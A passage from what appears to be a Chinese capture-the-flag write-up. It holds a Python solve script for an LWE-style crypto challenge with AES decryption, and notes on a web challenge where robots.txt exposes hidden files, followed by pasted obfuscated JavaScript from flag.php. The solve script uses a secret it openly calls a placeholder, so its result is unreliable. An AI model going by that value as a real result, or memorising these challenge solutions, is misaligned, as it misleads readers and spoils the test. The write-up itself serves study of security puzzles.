17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], [88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
q = 127

# Brute-force to find t0, t1, t2 (this is a placeholder; actual code would run this)
# After brute-forcing, suppose we find t = (47, 33, 58)
t0, t1, t2 = 47, 33, 58
s = [1, t0, t1, t2]

# Decrypt C to get M_bits
M_bits = []
for row in C:
    product = (s[0]*row[0] + s[1]*row[1] + s[2]*row[2] + s[3]*row[3]) % q
    product_signed = product if product <= q//2 else product - q
    # Check if close to 63 (M[i] = 1) or 0 (M[i] = 0)
    if abs(product_signed - 63) <= 20:
        M_bits.append(1)
    else:
        M_bits.append(0)

# Convert bits to bytes
bits = ''.join(map(str, M_bits))
# Pad with zeros to make length multiple of 8
if len(bits) % 8 != 0:
    bits += '0' * (8 - len(bits) % 8)
hint_bytes = bytes([int(bits[i:i+8], 2) for i in range(0, len(bits), 8)])
hint = hint_bytes.decode('ascii', errors='replace')

# The AES key is provided in the problem output
key = b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
encrypted = b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'

# Assuming IV is all zeros (common if not specified)
iv = b'\x00' * 16
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted = unpad(cipher.decrypt(encrypted), 16)

# 过滤不可见字符和非ASCII字符
filtered = ''.join([
    chr(byte) if 32 <= byte <= 126 else ''  # 保留可打印ASCII字符，其他替换为空
    for byte in decrypted
])

print("Filtered plaintext:")
print(filtered)

外国山海经

访问/robots.txt，得到

#shu.php  sha.php  wa.php  flag.php  flag.php.swp

访问flag.php，得到混淆js，解js混淆

(function(_0x5bfa63, _0x281ba4) {
    var _0x628a90 = {
        _0x28e595: 0x190,
        _0x466706: 0x17a,
        _0x570276: 0x192,
        _0x4e238d: 0x128,
        _0xf7fd91: 0x139,
        _0x4ff7de: 0x144,
        _0xf17c9a: 0x132,
        _0x140c6f: 0x117,
        _0x2e9d5d: 0x124,
        _0x27ecfb: 0x16f,
        _0x1f08ae: 0x16e,
        _0x429bb1: 0x185,
        _0x5259a4: 0x186,
        _0xf069bc: 0xfc,
        _0x36775b: 0xda,
        _0x1a81bc: 0x101,
        _0x4fbeb3: 0x159,
        _0x5f0ac4: 0x16a,
        _0x2b1d0c: 0x15f,
        _0x45b6b4: 0x160,
        _0x542167: 0x17c,
        _0x300668: 0x15a,
        _0x5d82fc: 0x13b,
        _0x4fc9cc: 0x176,
        _0x1f53f0: 0x146,
        _0x99afde: 0xfe,
        _0x39b153: 0xf0,
        _0xed7676: 0xef,
        _0x3a214b: 0x10c,
        _0x18fd83: 0x115,
        _0x44ec87: 0x166,
        _0x3009e4: 0x163,
        _0x362ea9: 0x170
    }
      , _0x28823e = {
        _0x456064: 0x20a
    }
      , _0xb2ea4e = {
        _0x332eb1: 0x262
    };
    function _0x5afd48(_0x372bcf, _0x587d2c, _0x343524, _0x7ab981) {
        return _0x2fa2(_0x7ab981 - -_0xb2ea4e._0x332eb1, _0x343524);
    }
    var _0x19cd46 = _0x5bfa63();
    function _0x180c55(_0x65cbe3, _0x1b7dab, _0x513f23, _0x2e4568) {
        return _0x2fa2(_0x65cbe3 - -_0x28823e._0x456064, _0x2e4568);
    }
    while (!![]) {
        try {
            var _0x27e61b = parseInt(_0x5afd48(-0x18e, -_0x628a90._0x28e595, -_0x628a90._0x466706, -_0x628a90._0x570276)) / (0x1f33 + -0xda2 + -0x1190) * (-parseInt(_0x180c55(-_0x628a90._0x4e238d, -_0x628a90._0xf7fd91, -_0x628a90._0x4ff7de, -_0x628a90._0xf17c9a)) / (-0x97e * -0x2 + 0x8 * -0x98 + 0x25f * -0x6)) + parseInt(_0x180c55(-0x10d, -_0x628a90._0x140c6f, -0x111, -_0x628a90._0x2e9d5d)) / (-0x115 * -0xa + -0x63b + -0x24a * 0x2) * (parseInt(_0x5afd48(-_0x628a90._0x27ecfb, -_0x628a90._0x1f08ae, -_0x628a90._0x429bb1, -_0x628a90._0x5259a4)) / (-0x95 + 0x6c0 + -0x627)) + parseInt(_0x180c55(-_0x628a90._0xf069bc, -0x108, -_0x628a90._0x36775b, -_0x628a90._0x1a81bc)) / (0x14ca + 0xf94 + -0x2459) + -parseInt(_0x5afd48(-_0x628a90._0x4fbeb3, -0x151, -_0x628a90._0x5f0ac4, -0x167)) / (0x11ed + 0x1133 + -0x118d * 0x2) * (-parseInt(_0x5afd48(-_0x628a90._0x2b1d0c, -_0x628a90._0x45b6b4, -_0x628a90._0x542167, -_0x628a90._0x300668)) / (0x1d5 * -0x6 + 0x1 * -0x6dd + 0x11e2)) + -parseInt(_0x5afd48(-_0x628a90._0x5d82fc, -_0x628a90._0x4fc9cc, -_0x628a90._0x1f53f0, -0x157)) / (-0x475 + -0x172a + 0x1ba7) * (parseInt(_0x180c55(-_0x628a90._0x99afde, -_0x628a90._0x39b153, -_0x628a90._0xed7676, -0xde)) / (0x1caa + 0x8ed + 0xd1 * -0x2e)) + parseInt(_0x180c55(-_0x628a90._0x3a214b, -0x119, -0xee, -_0x628a90._0x18fd83)) / (-0x687 + -0x7c8 + 0xe59 * 0x1) * (-parseInt(_0x5afd48(-0x16c, -0x179, -_0x628a90._0x44ec87, -_0x628a90._0x3009e4)) / (-0xdba * -0x2 + -0x21bd + -0xc * -0x87)) + parseInt(_0x5afd48(-_0x628a90._0x362ea9, -_0x628a90._0x3009e4, -0x174, -0x182)) / (0xc54 + -0x91 * 0x1 + 0xbb7 * -0x1);
            if (_0x27e61b === _0x281ba4)
                break;
            else
                _0x19cd46['push'](_0x19cd46['shift']());
        } catch (_0x412f22) {
            _0x19cd46['push'](_0x19cd46['shift']());
        }
    }
}(_0x219d, -0x318d8 + -0x1 * -0x54f5 + 0x75601));
var _0x3587de = (function() {
    var _0x4021ac = {
        _0x58c1ae: 0x13d,
        _0x3c3fdf: 0x15a,
        _0x51959f: 0x136,
        _0x1a346a: 0x267,
        _0x970c7c: 0x26b,
        _0x450fa8: 0x27d,
        _0x3dffdb: 0x27c,
        _0x20c184: 0x295,
        _0x1d0c10: 0x262,
        _0x1fdb73: 0x130,
        _0x5a02fe: 0x119,
        _0x4ee755: 0x111,
        _0x5226ab: 0x11b,
        _0xee055f: 0x28b,
        _0xede8f3: 0x252,
        _0x7e624b: 0x143,
        _0x446a52: 0x138,
        _0x308418: 0x139,
        _0x4ebdea: 0x27e,
        _0x26518b: 0x29b,
        _0x51d380: 0x28a,
        _0x18efbb: 0x275,
        _0x1d15b8: 0x13f,
        _0x1ab8ab: 0x126,
        _0x20ee91: 0x13e,
        _0x5cc3e2: 0x157,
        _0x330753: 0x260,
        _0x182013: 0x272,
        _0x217183: 0x27b,
        _0x3d043a: 0x26c
    }
      , _0x5724b4 = {
        _0x2f801f: 0x22a,
        _0x3e3ff7: 0x225,
        _0x4592b5: 0x229,
        _0x23ef8d: 0x23d,
        _0x4d4486: 0x243,
        _0x1c90a0: 0x220,
        _0x16effd: 0x251,
        _0x4453ae: 0x22f,
        _0x53295a: 0x250
    }
      , _0xb6c053 = {
        _0x43286b: 0x152,
        _0x21fedd: 0x13b,
        _0x2988ea: 0x131,
        _0x3ae920: 0x10e,
        _0x17968e: 0xfb,
        _0x1b699f: 0x14d,
        _0x5ccb44: 0x146,
        _0x1270f6: 0x15c,
        _0x44b00d: 0x166,
        _0x147a9c: 0x14e,
        _0x2e7542: 0x134,
        _0x309998: 0x14b,
        _0x5ee480: 0x13f,
        _0x57614d: 0x11f,
        _0xb63fe0: 0x145,
        _0x18adec: 0x114,
        _0x2d16b8: 0x12a,
        _0x2e4b10: 0x13e,
        _0x45c809: 0x168,
        _0x2bfc7e: 0x14f,
        _0x160f3a: 0x159,
        _0x5e2224: 0x167,
        _0x1d2868: 0x152,
        _0x5909a1: 0x130,
        _0x4a17f6: 0x154,
        _0x3cdbb1: 0x157,
        _0x23ed39: 0x15a,
        _0x251934: 0x12b,
        _0x37334a: 0x156,
        _0x2aac5c: 0x13b,
        _0x343854: 0x157,
        _0x20b51c: 0x16e,
        _0x1c1154: 0x115,
        _0x6f8a3: 0x12b,
        _0x2cdd60: 0x13c
    }
      , _0x141051 = {
        _0x4c0a4c: 0x3e5,
        _0x5af9da: 0x181
    }
      , _0x331a16 = {
        _0x3b625e: 0x235
    };
    function _0x16015f(_0x47cbe1, _0x203be2, _0x42df40, _0x2fc801) {
        return _0x2fa2(_0x47cbe1 - -_0x331a16._0x3b625e, _0x203be2);
    }
    var _0x1e85cf = {};
    _0x1e85cf[_0x16015f(-_0x4021ac._0x58c1ae, -0x124, -_0x4021ac._0x3c3fdf, -_0x4021ac._0x51959f)] = function(_0x124e68, _0x375486) {
        return _0x124e68 !== _0x375486;
    }
    ;
    function _0x1d0710(_0x534c0e, _0xd016c3, _0x1cb96e, _0x177622) {
        return _0x2fa2(_0x534c0e - -0x361, _0x1cb96e);
    }
    _0x1e85cf['bhVnY'] = _0x1d0710(-_0x4021ac._0x1a346a, -0x282, -_0x4021ac._0x970c7c, -_0x4021ac._0x450fa8),
    _0x1e85cf[_0x1d0710(-_0x4021ac._0x3dffdb, -0x288, -_0x4021ac._0x20c184, -_0x4021ac._0x1d0c10)] = function(_0xf0c5e5, _0x41f4ee) {
        return _0xf0c5e5 === _0x41f4ee;
    }
    ,
    _0x1e85cf['FroGP'] = _0x16015f(-_0x4021ac._0x1fdb73, -_0x4021ac._0x5a02fe, -_0x4021ac._0x4ee755, -_0x4021ac._0x5226ab),
    _0x1e85cf[_0x1d0710(-0x272, -_0x4021ac._0x20c184, -_0x4021ac._0xee055f, -_0x4021ac._0xede8f3)] = _0x16015f(-_0x4021ac._0x7e624b, -0x164, -_0x4021ac._0x446a52, -_0x4021ac._0x308418),
    _0x1e85cf[_0x1d0710(-_0x4021ac._0x4ebdea, -_0x4021ac._0x26518b, -_0x4021ac._0x51d380, -_0x4021ac._0x18efbb)] = function(_0x558755, _0x4bc882) {
        return _0x558755 === _0x4bc882;
    }
    ,
    _0x1e85cf[_0x16015f(-_0x4021ac._0x1d15b8, -_0x4021ac._0x1ab8ab, -_0x4021ac._0x20ee91, -_0x4021ac._0x5cc3e2)] = _0x1d0710(-_0x4021ac._0x330753, -_0x4021ac._0x182013, -_0x4021ac._0x217183, -_0x4021ac._0x3d043a);
    var _0x21f727 = _0x1e85cf
      , _0x14c4a4 = !![];
    return function(_0x1c40d7, _0x5cfc78) {
        var _0x1d01a4 = {
            _0x493447: 0x4a8
        };
        function _0x1cff74(_0x4d24a1, _0x343770, _0xfafe, _0x1eb6dc) {
            return _0x1d0710(_0x4d24a1 - _0x1d01a4._0x493447, _0x343770 - 0x46, _0x343770, _0x1eb6dc - 0x190);
        }
        function _0x1c96af(_0x893911, _0x2291a8, _0x287241, _0x317f06) {
            return _0x16015f(_0x317f06 - _0x141051._0x4c0a4c, _0x287241, _0x287241 - _0x141051._0x5af9da, _0x317f06 - 0x3b);
        }
        if (_0x21f727[_0x1cff74(_0x5724b4._0x2f801f, _0x5724b4._0x3e3ff7, _0x5724b4._0x4592b5, 0x212)](_0x21f727[_0x1cff74(_0x5724b4._0x23ef8d, _0x5724b4._0x4d4486, _0x5724b4._0x1c90a0, _0x5724b4._0x16effd)], _0x21f727[_0x1cff74(0x23d, _0x5724b4._0x4453ae, _0x5724b4._0x53295a, 0x25d)])) {
            var _0x3a58cc = _0x14c4a4 ? function() {
                var _0x5c15d6 = {
                    _0x4a8bea: 0x15e,
                    _0x38712d: 0x30
                };
                function _0x140275(_0x526de1, _0x462836, _0x5d2e48, _0xcb505a) {
                    return _0x1c96af(_0x526de1 - 0x1d2, _0x462836 - 0x166, _0x462836, _0x5d2e48 - -0x3c4);
                }
                function _0x575be4(_0xaacffc, _0x4294bf, _0x5d7f4c, _0x222164) {
                    return _0x1cff74(_0x4294bf - -0x37a, _0xaacffc, _0x5d7f4c - _0x5c15d6._0x4a8bea, _0x222164 - _0x5c15d6._0x38712d);
                }
                if (_0x21f727[_0x575be4(-_0xb6c053._0x43286b, -_0xb6c053._0x21fedd, -0x12d, -_0xb6c053._0x2988ea)](_0x140275(-0x121, -_0xb6c053._0x3ae920, -0x11a, -_0xb6c053._0x17968e), _0x21f727[_0x140275(-0x153, -_0xb6c053._0x1b699f, -_0xb6c053._0x5ccb44, -_0xb6c053._0x1270f6)])) {
                    if (_0x2919f7) {
                        var _0x493883 = _0xc6e29b['apply'](_0x4d40d9, arguments);
                        return _0x35dcd6 = null,
                        _0x493883;
                    }
                } else {
                    if (_0x5cfc78) {
